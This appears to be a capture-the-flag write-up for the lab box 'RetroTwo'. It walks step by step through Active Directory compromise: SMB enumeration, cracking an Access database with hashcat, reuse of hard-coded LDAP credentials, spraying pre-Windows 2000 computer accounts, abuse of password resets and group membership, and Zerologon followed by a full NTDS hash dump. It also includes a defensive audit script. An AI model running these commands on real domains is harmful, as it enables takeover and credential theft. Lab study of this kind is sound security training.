RetroTwo

The User flag for this Box is located in a non-standard directory, C:.

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nmap 10.129.34.62
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 12:09 EDT
Nmap scan report for BLN01.retro2.vl (10.129.34.62)
Host is up (0.15s latency).
Not shown: 983 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 35.43 seconds
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nmap 10.129.34.62  -p 53,88,135,139,389,445,464,593,636,3268,3269,3389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 12:17 EDT
Nmap scan report for BLN01.retro2.vl (10.129.34.62)
Host is up (0.18s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-26 16:17:15Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds  Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2025-10-25T16:05:40
|_Not valid after:  2026-04-26T16:05:40
| rdp-ntlm-info:
|   Target_Name: RETRO2
|   NetBIOS_Domain_Name: RETRO2
|   NetBIOS_Computer_Name: BLN01
|   DNS_Domain_Name: retro2.vl
|   DNS_Computer_Name: BLN01.retro2.vl
|   Product_Version: 6.1.7601
|_  System_Time: 2025-10-26T16:17:28+00:00
|_ssl-date: 2025-10-26T16:18:08+00:00; +1s from scanner time.
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: -11m58s, deviation: 26m47s, median: 0s
| smb2-time:
|   date: 2025-10-26T16:17:29
|_  start_date: 2025-10-26T16:05:01
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2025-10-26T17:17:32+01:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.64 seconds

1.2. Anonymous SMB access to the Public share

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u guest -p '' --shares
SMB         10.129.34.62    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.34.62    445    BLN01            [+] retro2.vl\guest:
SMB         10.129.34.62    445    BLN01            [*] Enumerated shares
SMB         10.129.34.62    445    BLN01            Share           Permissions     Remark
SMB         10.129.34.62    445    BLN01            -----           -----------     ------
SMB         10.129.34.62    445    BLN01            ADMIN$                          Remote Admin
SMB         10.129.34.62    445    BLN01            C$                              Default share
SMB         10.129.34.62    445    BLN01            IPC$                            Remote IPC
SMB         10.129.34.62    445    BLN01            NETLOGON                        Logon server share
SMB         10.129.34.62    445    BLN01            Public          READ
SMB         10.129.34.62    445    BLN01            SYSVOL                          Logon server share
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# smbclient -U '' -N   //BLN01.retro2.vl/public
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug 17 10:30:37 2024
  ..                                  D        0  Sat Aug 17 10:30:37 2024
  DB                                  D        0  Sat Aug 17 08:07:06 2024
  Temp                                D        0  Sat Aug 17 07:58:05 2024

                6290943 blocks of size 4096. 821183 blocks available
smb: \> cd db
smb: \db\> ls
  .                                   D        0  Sat Aug 17 08:07:06 2024
  ..                                  D        0  Sat Aug 17 08:07:06 2024
  staff.accdb                         A   876544  Sat Aug 17 10:30:19 2024

                6290943 blocks of size 4096. 821183 blocks available
smb: \db\> get staff.accdb
getting file \db\staff.accdb of size 876544 as staff.accdb (76.4 KiloBytes/sec) (average 76.4 KiloBytes/sec)
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# file staff.accdb
staff.accdb: Microsoft Access Database

Crack the database password (office2john, then hashcat mode 9600 against rockyou.txt):

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# office2john staff.accdb
staff.accdb:$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235

$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:class08

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 9600 (MS Office 2013)
Hash.Target......: $office$*2013*100000*256*16*5736cfcbb054e749a8f3035...018235
Time.Started.....: Mon Oct 27 00:30:07 2025 (3 secs)
Time.Estimated...: Mon Oct 27 00:30:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:     9463 H/s (13.90ms) @ Accel:17 Loops:500 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 26112/14344388 (0.18%)
Rejected.........: 0/26112 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> charger1
Hardware.Mon.#01.: Temp: 63c Util: 99% Core:2445MHz Mem:8001MHz Bus:8

1.3. Microsoft Access DB

This file has to be opened with Microsoft Access, but I didn't want to install it.

Once opened, the following VBA module can be extracted from it:

Attribute VB_Name = "Staff"
Option Compare Database

Sub ImportStaffUsersFromLDAP()
    Dim objConnection As Object
    Dim objCommand As Object
    Dim objRecordset As Object
    Dim strLDAP As String
    Dim strUser As String
    Dim strPassword As String
    Dim strSQL As String
    Dim db As Database
    Dim rst As Recordset

    strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
    ' Domain credentials hard-coded in the module (the interesting part)
    strUser = "retro2\ldapreader"
    strPassword = "ppYaVcB5R"

    Set objConnection = CreateObject("ADODB.Connection")

    objConnection.Provider = "ADsDSOObject"
    objConnection.Properties("User ID") = strUser
    objConnection.Properties("Password") = strPassword
    objConnection.Properties("Encrypt Password") = True
    objConnection.Open "Active Directory Provider"

    Set objCommand = CreateObject("ADODB.Command")
    objCommand.ActiveConnection = objConnection

    objCommand.CommandText = "<" & strLDAP & ">;(objectCategory=person);cn,distinguishedName,givenName,sn,sAMAccountName,userPrincipalName,description;subtree"

    Set objRecordset = objCommand.Execute

    Set db = CurrentDb
    Set rst = db.OpenRecordset("StaffMembers", dbOpenDynaset)

    Do Until objRecordset.EOF
        rst.AddNew
        rst!CN = objRecordset.Fields("cn").Value
        rst!DistinguishedName = objRecordset.Fields("distinguishedName").Value
        rst!GivenName = Nz(objRecordset.Fields("givenName").Value, "")
        rst!SN = Nz(objRecordset.Fields("sn").Value, "")
        rst!sAMAccountName = objRecordset.Fields("sAMAccountName").Value
        rst!UserPrincipalName = Nz(objRecordset.Fields("userPrincipalName").Value, "")
        rst!Description = Nz(objRecordset.Fields("description").Value, "")
        rst.Update

        objRecordset.MoveNext
    Loop

    rst.Close
    objRecordset.Close
    objConnection.Close
    Set rst = Nothing
    Set objRecordset = Nothing
    Set objCommand = Nothing
    Set objConnection = Nothing

    MsgBox "Staff users imported successfully!", vbInformation
End Sub

This yields a pair of credentials:

strUser = "retro2\ldapreader"
strPassword = "ppYaVcB5R"
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u ldapreader -p ppYaVcB5R --generate-tgt ldapreader
SMB         10.129.34.62    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.34.62    445    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R
SMB         10.129.34.62    445    BLN01            [+] TGT saved to: ldapreader.ccache
SMB         10.129.34.62    445    BLN01            [+] Run the following command to use the TGT: export KRB5CCNAME=ldapreader.ccache

1.4. BloodHound

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# bloodhound-ce-python -c All -p ppYaVcB5R  -d retro2.vl  -ns  10.129.34.62  -u ldapreader  --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: retro2.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: bln01.retro2.vl
INFO: Testing resolved hostname connectivity dead:beef::8930:fdfa:8cdc:ca77
INFO: Trying LDAP connection to dead:beef::8930:fdfa:8cdc:ca77
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: bln01.retro2.vl
INFO: Testing resolved hostname connectivity dead:beef::8930:fdfa:8cdc:ca77
INFO: Trying LDAP connection to dead:beef::8930:fdfa:8cdc:ca77
INFO: Found 27 users
INFO: Found 43 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: BLN01.retro2.vl
INFO: Done in 00M 37S
INFO: Compressing output into 20251026130336_bloodhound.zip

There is no path to user from here.

Let's see whether SMB offers anything more with these credentials:

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u ldapreader -p ppYaVcB5R --shares
SMB         10.129.34.62    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.34.62    445    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R
SMB         10.129.34.62    445    BLN01            [*] Enumerated shares
SMB         10.129.34.62    445    BLN01            Share           Permissions     Remark
SMB         10.129.34.62    445    BLN01            -----           -----------     ------
SMB         10.129.34.62    445    BLN01            ADMIN$                          Remote Admin
SMB         10.129.34.62    445    BLN01            C$                              Default share
SMB         10.129.34.62    445    BLN01            IPC$                            Remote IPC
SMB         10.129.34.62    445    BLN01            NETLOGON        READ            Logon server share
SMB         10.129.34.62    445    BLN01            Public          READ
SMB         10.129.34.62    445    BLN01            SYSVOL          READ            Logon server share

1.5. Pre-Windows 2000 computer accounts

[screenshot: Pasted image 20251027010943.png]
We can see that three computer accounts were created as pre-Windows 2000 computers; the password of such an account is usually just the computer name in lowercase, without the trailing $.

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u users -p passwords.txt --continue-on-success
SMB         10.129.34.62    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS02$:ADMWS01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\ADMWS01$:ADMWS01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS01$:ADMWS01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS02$:FS01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\ADMWS01$:FS01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS01$:FS01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS02$:FS02 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\ADMWS01$:FS02 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS01$:FS02 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS02$:fs01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\ADMWS01$:fs01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS02$:fs02 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\ADMWS01$:fs02 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS01$:fs02 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS02$:admws01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\ADMWS01$:admws01 STATUS_LOGON_FAILURE
SMB         10.129.34.62    445    BLN01            [-] retro2.vl\FS01$:admws01 STATUS_LOGON_FAILURE

Verify with -k (Kerberos), because NTLM logons for these workstation trust accounts return STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT even when the password is correct:

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u users -p passwords.txt --continue-on-success -k
SMB         BLN01.retro2.vl 445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\FS02$:ADMWS01 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\ADMWS01$:ADMWS01 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\FS01$:ADMWS01 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\FS02$:FS01 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\ADMWS01$:FS01 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\FS01$:FS01 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\FS02$:FS02 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\ADMWS01$:FS02 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\FS01$:FS02 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\FS02$:fs01 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\ADMWS01$:fs01 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [+] retro2.vl\FS01$:fs01
SMB         BLN01.retro2.vl 445    BLN01            [+] retro2.vl\FS02$:fs02
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\ADMWS01$:fs02 KDC_ERR_PREAUTH_FAILED
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\ADMWS01$:admws01 KDC_ERR_PREAUTH_FAILED

Two credentials:
retro2.vl\FS01$:fs01
retro2.vl\FS02$:fs02

[screenshot: Pasted image 20251027011605.png]
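The condition exploited in this section can be inventoried from the defender's side. The audit below is an added example, not part of the original write-up: it takes computer objects with their LDAP attributes (as a client such as ldap3 would return them), flags enabled workstation trust accounts that carry the PASSWD_NOTREQD bit the pre-Windows 2000 checkbox sets, and, going one step beyond the text, separates accounts that never logged on (still on the name-derived password) from ones that have joined since. The hostnames are the box's; every attribute value is constructed.

```python
"""Audit computer accounts for the pre-Windows 2000 default-password condition.

Added example, not part of the original write-up. Input is a list of computer
objects with LDAP attributes; hostnames are the box's, values are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass

# userAccountControl bits from Microsoft's ADS_USER_FLAG_ENUM documentation
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000
TRUSTED_FOR_DELEGATION = 0x80000

UAC_FLAGS = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    PASSWD_NOTREQD: "PASSWD_NOTREQD",
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
}

# Filter to pull the same population live from the domain: computers whose
# userAccountControl has PASSWD_NOTREQD set (LDAP_MATCHING_RULE_BIT_AND rule).
PRE2000_LDAP_FILTER = (
    "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=32))"
)

# Constructed sample. 4128 = WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD, the
# value written when "Assign this computer account as a pre-Windows 2000
# computer" is ticked; 532480 = SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
# (a domain controller); lastLogonTimestamp 0 means the account never logged on.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "BLN01$", "userAccountControl": 532480, "lastLogonTimestamp": 133758000000000000},
    {"sAMAccountName": "FS01$", "userAccountControl": 4128, "lastLogonTimestamp": 0},
    {"sAMAccountName": "FS02$", "userAccountControl": 4128, "lastLogonTimestamp": 0},
    {"sAMAccountName": "ADMWS01$", "userAccountControl": 4128, "lastLogonTimestamp": 133758000000000000},
    {"sAMAccountName": "OLDWS99$", "userAccountControl": 4130, "lastLogonTimestamp": 0},
]


def decode_uac(uac: int) -> set[str]:
    """Return the names of the known userAccountControl bits set in uac."""
    return {name for bit, name in UAC_FLAGS.items() if uac & bit}


@dataclass
class Finding:
    sam: str
    flags: set[str]
    never_logged_on: bool

    @property
    def verdict(self) -> str:
        # A pre-created account keeps its name-derived password until the real
        # machine joins and rotates it, so one that never logged on almost
        # certainly still has it; one that has logged on is only flagged for review.
        return "likely-default" if self.never_logged_on else "review"


def pre2000_candidates(entries: list[dict]) -> list[Finding]:
    """Enabled workstation trust accounts with PASSWD_NOTREQD set, sorted by name."""
    findings = []
    for e in entries:
        uac = int(e["userAccountControl"])
        if uac & ACCOUNTDISABLE:
            continue                      # disabled accounts cannot authenticate
        if not uac & WORKSTATION_TRUST_ACCOUNT:
            continue                      # skips DCs (SERVER_TRUST_ACCOUNT) and users
        if not uac & PASSWD_NOTREQD:
            continue                      # the pre-Windows 2000 marker is absent
        findings.append(Finding(
            sam=e["sAMAccountName"],
            flags=decode_uac(uac),
            never_logged_on=int(e.get("lastLogonTimestamp", 0)) == 0,
        ))
    return sorted(findings, key=lambda f: f.sam)


def summarize(entries: list[dict]) -> dict[str, str]:
    """Map each flagged account to its verdict; the fix is a password reset."""
    return {f.sam: f.verdict for f in pre2000_candidates(entries)}


if __name__ == "__main__":
    for sam, verdict in summarize(SAMPLE_COMPUTERS).items():
        print(f"{sam:<10} {verdict}")
```

Resetting the flagged accounts' passwords (or deleting stale pre-created objects) closes the hole; the ldapreader account from section 1.3 has enough rights to run the read-only query.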

1.6. RDP

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u 'fs01$' -p fs01 --generate-tgt fs01 -k
SMB         BLN01.retro2.vl 445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         BLN01.retro2.vl 445    BLN01            [+] retro2.vl\fs01$:fs01
SMB         BLN01.retro2.vl 445    BLN01            [+] TGT saved to: fs01.ccache
SMB         BLN01.retro2.vl 445    BLN01            [+] Run the following command to use the TGT: export KRB5CCNAME=fs01.ccache

Reset the password of ADMWS01$ directly:

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# bloodyAD --host BLN01.retro2.vl -u fs01$    -d retro2.vl  -k  set password ADMWS01$ Admin123
[+] Password changed successfully!

Then add ldapreader to the services group:
[screenshot: Pasted image 20251027012633.png]

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# bloodyAD --host BLN01.retro2.vl -u fs01$    -d retro2.vl  -k  add  groupMember  'services' ldapreader
[+] ldapreader added to services

After that we can RDP in:

xfreerdp /u:ldapreader /p:ppYaVcB5R /v:BLN01.retro2.vl /tls-seclevel:0

[screenshot: Pasted image 20251027013113.png]

An old 2008-era system, truly retro.

2. Root

2.1. Zerologon (CVE-2020-1472)

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# python set_empty_pw.py BLN01 10.129.34.62
Performing authentication attempts...
============================================================================
NetrServerAuthenticate3Response
ServerCredential:
    Data:                            b"\xf2'(\xbf:\xf9\xe60"
NegotiateFlags:                  556793855
AccountRid:                      1001
ErrorCode:                       0


server challenge b'\xf2\xc8\x82\xb3m5\xf3\x9d'
NetrServerPasswordSet2Response
ReturnAuthenticator:
    Credential:
        Data:                            b'\x01\x1e+\xe1Ta{\xe3'
    Timestamp:                       0
ErrorCode:                       0



Success! DC should now have the empty string as its machine password.
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'retro2.vl/BLN01$@10.129.34.62'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c06552bdb50ada21a7c74536c231b848:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e242a90fb9503f383255a4328e75756:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:49c31c8f60320b9f416bc248231c008c:::
Julie.Martin:1105:aad3b435b51404eeaad3b435b51404ee:cf4999af837f40d72d1c5bcec27ba9b6:::
Clare.Smith:1106:aad3b435b51404eeaad3b435b51404ee:a7c82ec08414f0c54637fad20b9aac9e:::
Laura.Davies:1107:aad3b435b51404eeaad3b435b51404ee:ee74607fad6d8c51b0d488e322f82317:::
Rhys.Richards:1108:aad3b435b51404eeaad3b435b51404ee:09377f210fdbdcda6f97eda91ddc6879:::
Leah.Robinson:1109:aad3b435b51404eeaad3b435b51404ee:6333c620221c04d8fb5b6d7ca8b6d6d7:::
Michelle.Bird:1110:aad3b435b51404eeaad3b435b51404ee:c823220a9bda3ca70ebe7362187c9004:::
Kayleigh.Stephenson:1111:aad3b435b51404eeaad3b435b51404ee:a78835f0139b3b206f9598fe9c18d707:::
Charles.Singh:1112:aad3b435b51404eeaad3b435b51404ee:432119e62a10aff8c8200e4f45e772a0:::
Sam.Humphreys:1113:aad3b435b51404eeaad3b435b51404ee:3c1508fc774de1e6040c68b41a17fdee:::
Margaret.Austin:1114:aad3b435b51404eeaad3b435b51404ee:c6ebda46b0b014eda3ffcb8d92d179d9:::
Caroline.James:1115:aad3b435b51404eeaad3b435b51404ee:80835fee4ce88524f63a0ecf60870ac0:::
Lynda.Giles:1116:aad3b435b51404eeaad3b435b51404ee:dbf17856bd378ec410c20b98a749571f:::
Emily.Price:1117:aad3b435b51404eeaad3b435b51404ee:9cdf1d59674a6ddfedef2ae2545d3862:::
Lynne.Dennis:1118:aad3b435b51404eeaad3b435b51404ee:4b690295089b91881633113f13c866ee:::
Alexandra.Black:1119:aad3b435b51404eeaad3b435b51404ee:3349f04c2fdcf796a66c37b2a7658ae6:::
Alex.Scott:1120:aad3b435b51404eeaad3b435b51404ee:200155446e3b3817e8bc857dfe01b58c:::
Mandy.Davies:1121:aad3b435b51404eeaad3b435b51404ee:c144842c62c3051b8f1b8467ec62ef1f:::
Marilyn.Whitehouse:1122:aad3b435b51404eeaad3b435b51404ee:097b5b5b97e2a3b07db0b3deac5cd303:::
Lindsey.Harrison:1123:aad3b435b51404eeaad3b435b51404ee:261b8b9c79b19345e8ea15dcdfc03ecd:::
Sally.Davey:1124:aad3b435b51404eeaad3b435b51404ee:78ac830ac29ae1df8fa569b39515d5a5:::
retro2.vl\inventory:1128:aad3b435b51404eeaad3b435b51404ee:46b019644dde01251e7044a3d4185bd1:::
retro2.vl\ldapreader:1130:aad3b435b51404eeaad3b435b51404ee:fe63aaefd1cfd29d7cc5c14321a725f3:::
BLN01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ADMWS01$:1127:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
FS01$:1131:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
FS02$:1132:aad3b435b51404eeaad3b435b51404ee:eb354224f433cd7cd824b1fdce8c0795:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1de3d3d429521d8d99e4b4b31da5ce5f993902a8876adaabdd9449a5256c220f
krbtgt:aes128-cts-hmac-sha1-96:8250eee9083a48b1fca675d7d0ce3699
krbtgt:des-cbc-md5:d334438313291520
admin:aes256-cts-hmac-sha1-96:055842e1ada4e1cba5bd0286a4fa9de9337b0324104adc533aabea23ddc353b7
admin:aes128-cts-hmac-sha1-96:1e0f4d9eb0ea70d225db67d53f297934
admin:des-cbc-md5:70d0624397c708df
Julie.Martin:aes256-cts-hmac-sha1-96:5428f080b3303d74da2a344d0b799d97dfb5795fee1d1ed64b3e7e9cc3cbec5c
Julie.Martin:aes128-cts-hmac-sha1-96:8757cfac9fd8af791bd8f5c9b8bfac0c
Julie.Martin:des-cbc-md5:0e85dca2e3e6291a
Clare.Smith:aes256-cts-hmac-sha1-96:65c7c8d4e980f1e63fab4af0fb8b8dc17e9bddff20e7b8bb5fa5c1690561f406
Clare.Smith:aes128-cts-hmac-sha1-96:54cc3c8caadcd6e9b605d2da4c96e55f
Clare.Smith:des-cbc-md5:61fe8f52b39ecb9d
Laura.Davies:aes256-cts-hmac-sha1-96:9ada131aebb330b859770d3177e4b6bf2e37e994d83761e83c296e3dd0549fa4
Laura.Davies:aes128-cts-hmac-sha1-96:c00363c7acdb7e6efb47e90c46eb73f5
Laura.Davies:des-cbc-md5:31d670ec9b16c762
Rhys.Richards:aes256-cts-hmac-sha1-96:805f8d2f3f6c92cbf7bf0fc2449ec03ac8446b0f595aeb68d5e34932bdf1f9a8
Rhys.Richards:aes128-cts-hmac-sha1-96:baeaf7d174ea76419d381e545935aef2
Rhys.Richards:des-cbc-md5:6b0e2cf7ae3de3e3
Leah.Robinson:aes256-cts-hmac-sha1-96:90848db193370cc832b199b27137ef581b78eddc2d5f635a0e01e0b1c514c326
Leah.Robinson:aes128-cts-hmac-sha1-96:6aa30b143db0f0e65517bb062a4fe6c7
Leah.Robinson:des-cbc-md5:d9b6abe30e851f9b
Michelle.Bird:aes256-cts-hmac-sha1-96:a76108bec6385a4469d5eff1d4d5ccaaf066b981d56d3df82f058c1b66b9c653
Michelle.Bird:aes128-cts-hmac-sha1-96:ca9fdc76c484d05397433e90c2d9b84c
Michelle.Bird:des-cbc-md5:79b016e69ec4b59b
Kayleigh.Stephenson:aes256-cts-hmac-sha1-96:6c11e6b4e5e263bbb7b6859b7e4380bf9fce222de2e51da9f033c370d1bd3b34
Kayleigh.Stephenson:aes128-cts-hmac-sha1-96:69ced3d12c16659ae2fdaa2bab6df2f3
Kayleigh.Stephenson:des-cbc-md5:ce7ae949452a1997
Charles.Singh:aes256-cts-hmac-sha1-96:0eb1f6abc867ac77603b9b6f8b454abfef421c6eec2518e28e0e40ee3efb6215
Charles.Singh:aes128-cts-hmac-sha1-96:3cee7675dd2615a5214127faacb30930
